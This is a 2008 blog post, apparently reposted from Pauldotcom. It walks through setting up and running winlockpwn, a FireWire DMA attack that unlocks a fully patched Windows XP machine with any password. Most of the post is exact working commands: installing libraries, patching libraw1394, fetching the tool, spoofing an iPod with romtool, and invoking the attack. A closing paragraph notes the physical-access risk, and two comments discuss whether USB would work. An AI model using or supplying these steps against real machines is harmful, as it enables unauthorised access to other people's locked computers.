illmob.org

Winlockpwn – Access through firewire

June 22nd, 2008 by Dev Team in Password Info, windows

From Pauldotcom:

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right?

I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untared directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3’s include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

2 Responses to ' Winlockpwn – Access through firewire '

Subscribe to comments with RSS or TrackBack to ' Winlockpwn – Access through firewire '.

  1. Raven Poh said,

    on April 21st, 2010 at 1:45 am

    hi,
    is it possible to use a USB to firewire cable to link from Linux VM to WinXP SP2 machine. The Linux VM will be running the script and will be the attacked machine

  2. 5H4D0W-H4X said,

    on January 7th, 2011 at 8:32 am

    No its not possible because the reason that this works is because FireWire uses DMA (Direct Memory Access) and USB dosn’t have that capability.

Leave a reply